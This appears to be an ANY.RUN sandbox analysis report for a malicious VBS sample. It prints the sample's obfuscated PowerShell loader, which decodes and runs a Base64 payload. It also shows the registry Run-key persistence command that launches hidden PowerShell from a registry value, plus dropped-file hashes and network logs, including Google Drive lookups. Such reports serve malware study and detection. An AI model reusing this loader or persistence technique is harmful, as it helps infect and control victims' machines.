Alc1 VelSMargHFor,U on9Mura0DiveMS,deNStatATu eUCorph,lynE PrefMedi6NongSflamHPos iKollLUdslDP ovTStalHOcta- Co.s';$Administrere=Tariflns 'Pill>';$Agists=Tariflns 'Br.diUdfaeGyp x';$Saftningen0='Multispecies';$Viceborgmestrene='\Statsbesgene106.Phy';Thorvil (Tariflns ' ans$IndsG br,lLi loClinBTvana S llMind:StomLNonagAlleE JorPMisflVandAIndvN ristOp oEBaglRalte1 Enc3S.dt2,sso=Ded $W,goePardnO,erVOocy: Al.a eekP TrgP aldUkldAHjemt Dema,nco+extr$ F.eV StoI C.ec S lEIndfbDsleoCwo r E tgTilsMudmuE marsdebatPladR EnhE BecnEi.tE');Thorvil (Tariflns 'Trn,$nlbjGRec.l TriOPo ubUlemaOve l App: PerMSpiril kes Go,DBeauaMissnbedsnSagleFor.LPa,lS Vide NonRSol,Slu.r=Trus$WaagBOv rRObstI ResgBjeraFlopnDi,kdPre,iTeksNSak E .ry.I itS elfP HalL UdbI Udgt Fre(Fisk$Aucta NotdModtm,iftiCarcnLasti ForSBeattStedr Un EOrgarTo reNeig)');Thorvil (Tariflns $Saltmandlen);$Brigandine=$Misdannelsers[0];$Forsultnes=(Tariflns 'Sl.o$incog PrelUnaroCryaB olfA F.rLF rh:opklSHjerOOv,raTh rP BruERastrDuk ySkuf=DejeN HosEPippWPulm-Lig oMinbbU skjInveEPen,COkseTOn m SproSBje Y vddSWastTaf oeGenuMUnsa.Out.$ Stef ,aroArisUSmugR onASongG .haeL,geRyou IAcetNAfs.G AuteRestnVestS');Thorvil ($Forsultnes);Thorvil (Tariflns 'Mark$S ltS AntoUnsaaformp .tieEmberBetrybrug. RegHretieRhaba PredCogie .olrPre sVigt[Rea $O.lfRNonlePurgtBewarM.tiaSkalcRheutPossoSemerKroes ko]Gede=Sols$Pho T eliusysln .opgTrepe GrakTaruaImmunPalotFleleT.nnnNubis');$Togetheriness107=Tariflns 'depl$StabS OveoJensaTi,upCleaeTranr PyoyFrem.fa.eDSprnoOverwKul,nSloglRokkoAt raOpr dErhvFArthiNo dlM sfeUncr(Lang$ LedBGidsrTobiiUnu gOrthaBordnRetsd StriPrednForge nai,Prec$RadiSJ.zzcLavla Su lKernesemib,ronaTerirPlotkT,le)';$Scalebark=$Lgeplanter132;Thorvil (Tariflns ' one$Besgg L.tLFrugoRuskbTr.vaChunLFag :missC Al eHorenRkn.TBrydrSekraFr gl FedBProtIMi,sbLsekL S oiOceao mfotP.ogeFiloKF rgemi.fTU.mysW ll=Imar( natS ileStdeSBes T.onf-Ind PBlitA,efaTFantHWadd Hy $StemSVapocCompaRynklGebreOrn BPrioASociR Felk Lab)');while (!$centralbibliotekets) {Thorvil (Tariflns ' Flg$Ta rgReall Bilo,aanbUnstaEterlBode:leucT evieL vemB rkpPlasrCribebagvl .teyKast=V rk$HuskA lehmBandpRe cuSyntlGenns') ;Thorvil $Togetheriness107;Thorvil (Tariflns 'SlanS oadtMi iASkanR IontNomi- ReisDevilFlytePas e Te,PTins U oe4');Thorvil (Tariflns ' ink$ ,hegSimplRefrO Absb ,yta ExcLDrve: SelC rcieDezinNon TM.tor ArkAAfsplA ndBDefrISa tBmet L koliRygeo oqt StoeOospKBurge,dvaT B as U d=Nitr(.esmt upeeVognShusmT Civ-Ar.hPBohea Va,TD reh Dec .oca$S ilS CruCMiljA K jl MoteOmp B onAUnderAfdeKTra )') ;Thorvil (Tariflns ',rdr$Provg CybLButtOaf,ebRingaEff LOver:,naibvo olFordO .anMBagas Falt Ly ESlvtrSt ff SanOHun rPropR Raae Knit K.mNUnadi plNMicrgPseuEFunkNSanc=flle$ AfrGTestlDoneOManiBPlowaMa tlusol:B muAGaliabillRAn.aGPrioASkr.NRoeng O.dsAnmov M riCognN MysEBau 1,ool6 Civ9Elod+Kamm+Bisi% Syn$EndomS itI lumsSam.d DrvAMelin S rNBla eWhitLPrluSAn eE strrKiniSLoka.ElecCSelvO M.ruPeppNGallt') ;$Brigandine=$Misdannelsers[$Blomsterforretningen]}$Anbruddet=293276;$Bitterens78=29815;Thorvil (Tariflns ' Tid$HillGDejtL eccoKr.ebSpekA rolLFilo: GlaS SenTH,beU LinrIff,DUrtei,eliEKuffrFjelSPaafTUnmauC okrMensDFilmIManiEs ldsButt Kin=file T aGT,noeDeagTR.ex-A.isCDireOTebrn,arnTCaliEVejlNTenoTSuns Uns$E,izsma,bcmediATaleLAnveEGraabMingaj ngrCoquk');Thorvil (Tariflns 'lat $G,adgBrndlAntio deebAutoaPonylReb :CumqSGalip HanrEnsieN naeRonguhemewStje Trus=Su e Vag[ LagSglo,yS,rbsTaxitTidee.quim Dag.P,vlC To.oOvernPacovf omeHjtrrWeentRing] Hup:.aga:ChabFNoner uncoUnn mTankB Hera lefsNonee S.u6fims4,isaSPor.tSu.mrForbiUnvinKodegroen( oni$Ge,eSFst t ConuUfo rTromdFugliRo keAandrGlads.vint sotuSlanr EvedInveiRea ef essHgrn)');Thorvil (Tariflns 'Snoo$,eomG S nl,aanODagvb HydAKe.rlGud :Til,FAnkeOToldrEnectSummy oncSBoscKOplsEPyr.nSupedLrene Inf9 The4G nt acr =Ha t T ll[ BurSSt,vYBronSSideTSomaE PreMMetr.SeisT Ao,e ysXPaakTArk .craceUncrnViolcSponoUdstdQue iKissnKar,g Had]Came:An.a: StoAlockS Re cbrddiStv IMe,i.MoragEpi.e E sT Swes LusTJappR undiLn.unTjenGBund( ,ot$ConfsChriP ,isrf.rkeDipnECuteU Lgpwex e)');Thorvil (Tariflns ' Phe$UnhyGIldsLThorO Grobbeg.AOverLSulf:FyrsANoecd M aSSelvPBet RButteUnred SlaEBamalF rcs ,rkE VkkRFjen2Lead3snac5 .aa=Stav$UmbrF.kspoA,leR luetAutoyBal.sNavik SanERutsNOr hDSt,gEIsln9Fint4Spha.piprs.topUMultbAmbaSTvistFotorNstvI S jn S,oGWebs(sols$ ninABelyNSterbForbr B oURa.kdnutwDD nseHybrtHo a, Fre$ArabBSammiDouctLodsTMicrePlasrBisteSpaanUafhs t o7Re u8 Kvi)');Thorvil $Adspredelser235;
(PID) Process:(6056) msiexec.exeKey:HKEY_CURRENT_USER\Environment
Operation:writeName:Fjervgtsbokserne
Value:
c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(PID) Process:(4764) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Startup key
Value:
%Fjervgtsbokserne% -windowstyle 1 $Aktiveringers=(gp -Path 'HKCU:\Software\Wanhappy69\').Inexhaustibility;%Fjervgtsbokserne% ($Aktiveringers)
Executable files
0
Suspicious files
9
Text files
5
Unknown types
1

Dropped files

PID
Process
Filename
Type
6260powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0amgcr3t.khx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6260powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_e0btzwap.ox3.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6056msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAbinary
MD5:9F2A0DFD2D9B9554143BD97D8874F96A
SHA256:7B4EADE30962ABBA07718246F84B4BE5B582390E52EF6E48A5A1D2F0D531CDE5
6260powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:5501CA90F9C516FE1F9DD0DE2B17AC4A
SHA256:95BC5C1A280ED640ABE9BCED86D186E85D90F262ADBB94DF33164DAB1F544660
7064powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
6056msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_BB4872F70FE9CD99D6AAFAAAA12FAF2Eder
MD5:0B10C87CECF3F772F80D2016D0046CB2
SHA256:621237AE1C73369F97AB51D64AD31A2AFB4D6F5AB835705B80CE885F592D019C
6056msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199binary
MD5:E935BC5762068CAF3E24A2683B1B8A88
SHA256:A8ACCFCFEB51BD73DF23B91F4D89FF1A9EB7438EF5B12E8AFDA1A6FF1769E89D
6260powershell.exeC:\Users\admin\AppData\Roaming\Statsbesgene106.Phytext
MD5:4852E2DF1D1ACCC2D4F47CB70F10CD3F
SHA256:84BABA15CE108AAD9F54B9192F920E2EF9497EB467037E4F7D1ABA3A99C190B9
7064powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ymmxeels.u53.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6056msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAbinary
MD5:0DA325E309D1C8409843E47302CD7D88
SHA256:4573AB9EE135341533A2215FAFAA90374DC26ECCA12C5794194E0DD254D5899A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
41
DNS requests
23
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
440
svchost.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
440
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4504
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6056
msiexec.exe
GET
200
142.250.186.35:80
http://c.pki.goog/r/r1.crl
unknown
whitelisted
6056
msiexec.exe
GET
200
142.250.186.35:80
http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D
unknown
whitelisted
6056
msiexec.exe
GET
200
142.250.186.35:80
http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH
unknown
whitelisted
6056
msiexec.exe
GET
200
142.250.186.35:80
http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
440
svchost.exe
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
440
svchost.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
92.123.104.63:443
www.bing.com
Akamai International B.V.
DE
whitelisted
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4
System
192.168.100.255:138
whitelisted
1176
svchost.exe
20.190.159.2:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.156
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
google.com
  • 142.250.185.206
whitelisted
www.bing.com
  • 92.123.104.63
  • 92.123.104.4
  • 92.123.104.11
  • 92.123.104.61
  • 92.123.104.5
  • 92.123.104.67
  • 92.123.104.66
  • 92.123.104.10
  • 92.123.104.62
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.2
  • 20.190.159.4
  • 40.126.31.71
  • 20.190.159.71
  • 40.126.31.73
  • 20.190.159.68
  • 40.126.31.69
  • 20.190.159.23
whitelisted
go.microsoft.com
  • 69.192.162.125
whitelisted
drive.google.com
  • 142.250.184.206
shared
drive.usercontent.google.com
  • 216.58.206.33
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
script (1).vbs